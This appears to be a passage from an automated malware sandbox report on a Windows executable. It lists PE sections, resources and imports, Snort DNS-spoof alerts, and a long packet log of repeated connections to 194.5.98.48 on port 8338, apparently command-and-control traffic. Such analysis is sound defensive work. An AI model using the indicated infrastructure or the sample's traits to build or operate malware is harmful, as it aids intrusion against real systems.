IMAGE_DIRECTORY_ENTRY_DEBUG	0x397d0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x34218	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x32000	0x260	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3aaec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x30581	0x30600	False	0.589268410853	data	6.70021125825	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x32000	0xa332	0xa400	False	0.455030487805	data	5.23888424127	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3d000	0x238b0	0x1200	False	0.368272569444	data	3.83993526939	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.gfids	0x61000	0xe8	0x200	False	0.333984375	data	2.12166381533	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x62000	0x4c28	0x4e00	False	0.602263621795	data	6.36874241417	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x67000	0x210c	0x2200	False	0.786534926471	data	6.61038519378	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
PNG	0x62524	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States
PNG	0x6306c	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States
RT_ICON	0x64618	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 134243974, next used block 1626799870
RT_DIALOG	0x64900	0x286	data	English	United States
RT_DIALOG	0x64b88	0x13a	data	English	United States
RT_DIALOG	0x64cc4	0xec	data	English	United States
RT_DIALOG	0x64db0	0x12e	data	English	United States
RT_DIALOG	0x64ee0	0x338	data	English	United States
RT_DIALOG	0x65218	0x252	data	English	United States
RT_STRING	0x6546c	0x1e2	data	English	United States
RT_STRING	0x65650	0x1cc	data	English	United States
RT_STRING	0x6581c	0x1b8	data	English	United States
RT_STRING	0x659d4	0x146	Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500	English	United States
RT_STRING	0x65b1c	0x446	data	English	United States
RT_STRING	0x65f64	0x166	data	English	United States
RT_STRING	0x660cc	0x152	data	English	United States
RT_STRING	0x66220	0x10a	data	English	United States
RT_STRING	0x6632c	0xbc	data	English	United States
RT_STRING	0x663e8	0xd6	data	English	United States
RT_GROUP_ICON	0x664c0	0x14	data
RT_MANIFEST	0x664d4	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL

Import

KERNEL32.dll

GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer

gdiplus.dll

GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/13/21-12:00:04.635221	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60501	8.8.8.8	192.168.2.7
10/13/21-12:00:04.720504	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60501	8.8.8.8	192.168.2.7
10/13/21-12:00:16.594375	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	51837	8.8.8.8	192.168.2.7
10/13/21-12:00:37.676948	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	63668	8.8.8.8	192.168.2.7
10/13/21-12:00:48.500016	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60338	8.8.8.8	192.168.2.7
10/13/21-12:01:20.355715	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	50860	8.8.8.8	192.168.2.7
10/13/21-12:01:46.346307	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	59730	8.8.8.8	192.168.2.7
10/13/21-12:01:51.665856	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	59310	8.8.8.8	192.168.2.7
10/13/21-12:02:12.493659	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	64296	8.8.8.8	192.168.2.7
10/13/21-12:02:17.809141	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	56680	8.8.8.8	192.168.2.7
10/13/21-12:02:23.162203	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	58820	8.8.8.8	192.168.2.7
10/13/21-12:02:44.037075	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60983	8.8.8.8	192.168.2.7
10/13/21-12:03:25.959416	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	61457	8.8.8.8	192.168.2.7
10/13/21-12:03:46.660830	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	58367	8.8.8.8	192.168.2.7

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 13, 2021 12:00:05.576698065 CEST	49750	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:05.618726969 CEST	8338	49750	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:06.140115023 CEST	49750	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:06.182529926 CEST	8338	49750	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:06.687081099 CEST	49750	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:06.730057001 CEST	8338	49750	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:11.069850922 CEST	49751	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:11.112042904 CEST	8338	49751	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:11.624927044 CEST	49751	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:11.668311119 CEST	8338	49751	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:12.171859026 CEST	49751	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:12.214086056 CEST	8338	49751	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:16.636693001 CEST	49752	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:16.679898977 CEST	8338	49752	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:17.187891960 CEST	49752	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:17.231374979 CEST	8338	49752	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:17.734885931 CEST	49752	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:17.777971983 CEST	8338	49752	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:21.784370899 CEST	49753	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:21.827416897 CEST	8338	49753	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:22.329132080 CEST	49753	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:22.375300884 CEST	8338	49753	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:22.875890970 CEST	49753	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:22.921202898 CEST	8338	49753	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:26.924595118 CEST	49754	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:26.968862057 CEST	8338	49754	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:27.470041037 CEST	49754	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:27.513340950 CEST	8338	49754	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:28.016961098 CEST	49754	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:28.060928106 CEST	8338	49754	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:32.066013098 CEST	49759	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:32.108972073 CEST	8338	49759	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:32.611144066 CEST	49759	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:32.654954910 CEST	8338	49759	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:33.158401966 CEST	49759	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:33.201641083 CEST	8338	49759	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:37.678064108 CEST	49761	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:37.720103979 CEST	8338	49761	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:38.221244097 CEST	49761	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:38.263303995 CEST	8338	49761	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:38.767951965 CEST	49761	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:38.810178041 CEST	8338	49761	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:42.893822908 CEST	49767	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:42.936599970 CEST	8338	49767	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:43.612030029 CEST	49767	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:43.655189991 CEST	8338	49767	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:44.299602032 CEST	49767	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:44.341643095 CEST	8338	49767	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:48.501244068 CEST	49769	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:48.544317961 CEST	8338	49769	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:49.049973965 CEST	49769	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:49.093189001 CEST	8338	49769	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:49.596935034 CEST	49769	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:49.640307903 CEST	8338	49769	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:53.646163940 CEST	49770	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:53.692306995 CEST	8338	49770	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:54.206747055 CEST	49770	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:54.250010967 CEST	8338	49770	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:54.753608942 CEST	49770	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:54.797038078 CEST	8338	49770	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:59.179687977 CEST	49771	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:59.223104954 CEST	8338	49771	194.5.98.48	192.168.2.7
Oct 13, 2021 12:00:59.738486052 CEST	49771	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:00:59.781730890 CEST	8338	49771	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:00.285316944 CEST	49771	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:00.328739882 CEST	8338	49771	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:04.333800077 CEST	49774	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:04.378735065 CEST	8338	49774	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:04.910712004 CEST	49774	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:04.953919888 CEST	8338	49774	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:05.504760027 CEST	49774	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:05.548650026 CEST	8338	49774	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:09.633774996 CEST	49803	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:09.675630093 CEST	8338	49803	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:10.176783085 CEST	49803	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:10.219882011 CEST	8338	49803	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:10.724113941 CEST	49803	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:10.766130924 CEST	8338	49803	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:15.048734903 CEST	49810	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:15.090912104 CEST	8338	49810	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:15.599139929 CEST	49810	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:15.645664930 CEST	8338	49810	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:16.147871971 CEST	49810	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:16.190046072 CEST	8338	49810	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:20.357832909 CEST	49813	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:20.399966002 CEST	8338	49813	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:20.912126064 CEST	49813	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:20.954238892 CEST	8338	49813	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:21.459018946 CEST	49813	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:21.501517057 CEST	8338	49813	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:25.507765055 CEST	49814	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:25.550457954 CEST	8338	49814	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:26.053189993 CEST	49814	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:26.096246958 CEST	8338	49814	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:26.600882053 CEST	49814	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:26.645090103 CEST	8338	49814	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:30.681299925 CEST	49837	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:30.724416971 CEST	8338	49837	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:31.225433111 CEST	49837	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:31.268765926 CEST	8338	49837	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:31.772404909 CEST	49837	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:31.815530062 CEST	8338	49837	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:35.822279930 CEST	49842	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:35.865361929 CEST	8338	49842	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:36.366554976 CEST	49842	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:36.409733057 CEST	8338	49842	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:36.913386106 CEST	49842	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:36.956727028 CEST	8338	49842	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:41.031743050 CEST	49843	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:41.075189114 CEST	8338	49843	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:41.586195946 CEST	49843	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:41.630553961 CEST	8338	49843	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:42.132766962 CEST	49843	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:42.177167892 CEST	8338	49843	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:46.348254919 CEST	49844	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:46.391438007 CEST	8338	49844	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:46.898680925 CEST	49844	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:46.941874027 CEST	8338	49844	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:47.445916891 CEST	49844	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:47.489125967 CEST	8338	49844	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:51.679239988 CEST	49845	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:51.722491026 CEST	8338	49845	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:52.227286100 CEST	49845	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:52.270422935 CEST	8338	49845	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:52.774152040 CEST	49845	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:52.817307949 CEST	8338	49845	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:56.828818083 CEST	49862	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:56.872134924 CEST	8338	49862	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:57.376842022 CEST	49862	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:57.420485020 CEST	8338	49862	194.5.98.48	192.168.2.7
Oct 13, 2021 12:01:57.934889078 CEST	49862	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:01:57.978081942 CEST	8338	49862	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:01.995521069 CEST	49871	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:02.037914038 CEST	8338	49871	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:02.542654991 CEST	49871	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:02.584815025 CEST	8338	49871	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:03.096052885 CEST	49871	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:03.138467073 CEST	8338	49871	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:07.145071030 CEST	49872	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:07.187125921 CEST	8338	49872	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:07.690269947 CEST	49872	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:07.732306957 CEST	8338	49872	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:08.237327099 CEST	49872	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:08.279476881 CEST	8338	49872	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:12.495131016 CEST	49873	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:12.537189960 CEST	8338	49873	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:13.050035954 CEST	49873	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:13.092128992 CEST	8338	49873	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:13.597282887 CEST	49873	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:13.639588118 CEST	8338	49873	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:17.821381092 CEST	49874	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:17.863836050 CEST	8338	49874	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:18.379252911 CEST	49874	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:18.421348095 CEST	8338	49874	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:18.925539970 CEST	49874	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:18.969427109 CEST	8338	49874	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:23.164589882 CEST	49875	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:23.206796885 CEST	8338	49875	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:23.722978115 CEST	49875	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:23.765311003 CEST	8338	49875	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:24.269876957 CEST	49875	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:24.312139988 CEST	8338	49875	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:28.336330891 CEST	49876	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:28.379657984 CEST	8338	49876	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:28.895127058 CEST	49876	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:28.937880993 CEST	8338	49876	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:29.442064047 CEST	49876	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:29.484177113 CEST	8338	49876	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:33.541191101 CEST	49877	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:33.584619045 CEST	8338	49877	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:34.098737955 CEST	49877	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:34.140904903 CEST	8338	49877	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:34.645579100 CEST	49877	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:34.687805891 CEST	8338	49877	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:38.695743084 CEST	49878	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:38.737955093 CEST	8338	49878	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:39.239753008 CEST	49878	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:39.283065081 CEST	8338	49878	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:39.802371025 CEST	49878	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:39.844444990 CEST	8338	49878	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:44.038543940 CEST	49879	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:44.080873013 CEST	8338	49879	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:44.585650921 CEST	49879	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:44.627707958 CEST	8338	49879	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:45.130836964 CEST	49879	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:45.172883034 CEST	8338	49879	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:49.403508902 CEST	49880	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:49.446952105 CEST	8338	49880	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:49.959563971 CEST	49880	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:50.006011009 CEST	8338	49880	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:50.531493902 CEST	49880	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:50.574743032 CEST	8338	49880	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:54.682069063 CEST	49881	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:54.725364923 CEST	8338	49881	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:55.225474119 CEST	49881	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:55.268837929 CEST	8338	49881	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:55.773116112 CEST	49881	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:55.819073915 CEST	8338	49881	194.5.98.48	192.168.2.7
Oct 13, 2021 12:02:59.837376118 CEST	49882	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:02:59.880587101 CEST	8338	49882	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:00.382214069 CEST	49882	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:00.425373077 CEST	8338	49882	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:00.929069042 CEST	49882	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:00.972331047 CEST	8338	49882	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:04.980384111 CEST	49883	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:05.023725986 CEST	8338	49883	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:05.533467054 CEST	49883	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:05.576646090 CEST	8338	49883	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:06.085978031 CEST	49883	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:06.129247904 CEST	8338	49883	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:10.142997026 CEST	49884	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:10.186216116 CEST	8338	49884	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:10.697097063 CEST	49884	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:10.740314007 CEST	8338	49884	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:11.243129015 CEST	49884	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:11.286302090 CEST	8338	49884	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:15.378891945 CEST	49885	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:15.430392027 CEST	8338	49885	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:15.945976019 CEST	49885	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:15.989090919 CEST	8338	49885	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:16.493043900 CEST	49885	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:16.536217928 CEST	8338	49885	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:20.663908005 CEST	49886	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:20.709228992 CEST	8338	49886	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:21.212074041 CEST	49886	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:21.255321026 CEST	8338	49886	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:21.758959055 CEST	49886	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:21.802119017 CEST	8338	49886	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:25.960961103 CEST	49887	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:26.005583048 CEST	8338	49887	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:26.509443045 CEST	49887	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:26.552582979 CEST	8338	49887	194.5.98.48	192.168.2.7
Oct 13, 2021 12:03:27.056265116 CEST	49887	8338	192.168.2.7	194.5.98.48
Oct 13, 2021 12:03:27.099555969 CEST	8338	49887	194.5.98.48	192.168.2.7
